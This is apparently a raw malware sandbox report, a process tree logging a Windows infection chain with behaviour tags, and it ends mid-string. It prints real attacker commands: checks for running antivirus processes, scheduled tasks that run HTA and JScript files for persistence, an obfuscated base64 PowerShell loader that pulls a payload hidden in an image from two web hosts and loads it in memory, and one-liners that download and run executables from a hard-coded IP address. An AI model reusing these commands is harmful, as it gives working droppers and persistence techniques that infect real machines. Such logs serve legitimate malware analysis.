- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2164 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:552
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵
- System Location Discovery: System Language Discovery
PID:2388
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7646615⤵
- System Location Discovery: System Language Discovery
PID:592
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Fm5⤵
- System Location Discovery: System Language Discovery
PID:1684
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Tunnel" Addresses5⤵
- System Location Discovery: System Language Discovery
PID:364
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com5⤵
- System Location Discovery: System Language Discovery
PID:2080
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F5⤵
- System Location Discovery: System Language Discovery
PID:1464
-
-
C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.comMacromedia.com F5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2148 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:584
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵PID:676
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵
- System Location Discovery: System Language Discovery
PID:1100
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe"C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2436 -
C:\Windows\system32\cmd.execmd.exe /c 67938ad15f2a9.vbs4⤵PID:956
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67938ad15f2a9.vbs"5⤵PID:1384
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@Gk@awBm@Gs@a@BT@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ikfkhSk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"3⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\is-O21OG.tmp\LCESjzR.tmp"C:\Users\Admin\AppData\Local\Temp\is-O21OG.tmp\LCESjzR.tmp" /SL5="$901DA,14491362,830464,C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"4⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\is-RQBNK.tmp\driver3.exe"C:\Users\Admin\AppData\Local\Temp\is-RQBNK.tmp\driver3.exe"5⤵PID:2416
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052869101\eccdc4b32d.exe"C:\Users\Admin\AppData\Local\Temp\1052869101\eccdc4b32d.exe"3⤵PID:2748
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn NsY8Tma5SyM /tr "mshta C:\Users\Admin\AppData\Local\Temp\CY0ATtTd2.hta" /sc minute /mo 25 /ru "Admin" /f4⤵PID:2828
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NsY8Tma5SyM /tr "mshta C:\Users\Admin\AppData\Local\Temp\CY0ATtTd2.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2972
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\CY0ATtTd2.hta4⤵PID:2988
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MYMK2BATGNFS5BMKSJMHTNJMA0JDG8IX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
PID:2724 -
C:\Users\Admin\AppData\Local\TempMYMK2BATGNFS5BMKSJMHTNJMA0JDG8IX.EXE"C:\Users\Admin\AppData\Local\TempMYMK2BATGNFS5BMKSJMHTNJMA0JDG8IX.EXE"6⤵PID:3012
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1052870021\am_no.cmd" "3⤵PID:2796
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1052870021\am_no.cmd" any_word4⤵PID:1752
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- Delays execution with timeout.exe
PID:2476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵PID:2508
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
PID:1940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵PID:2308
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
PID:2976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵PID:1912
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
PID:936
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "ljptMmaCKTy" /tr "mshta \"C:\Temp\5kMBjtJzS.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1896
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\5kMBjtJzS.hta"5⤵PID:1584
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Command and Scripting Interpreter: PowerShell
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵PID:2544
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052883001\046161f9c9.exe"C:\Users\Admin\AppData\Local\Temp\1052883001\046161f9c9.exe"3⤵PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\1052895001\b2fa280ab7.exe"C:\Users\Admin\AppData\Local\Temp\1052895001\b2fa280ab7.exe"3⤵PID:2368
-
C:\Windows\system32\cmd.execmd.exe /c 67938ad15f2a9.vbs4⤵PID:2940
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67938ad15f2a9.vbs"5⤵PID:1600
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@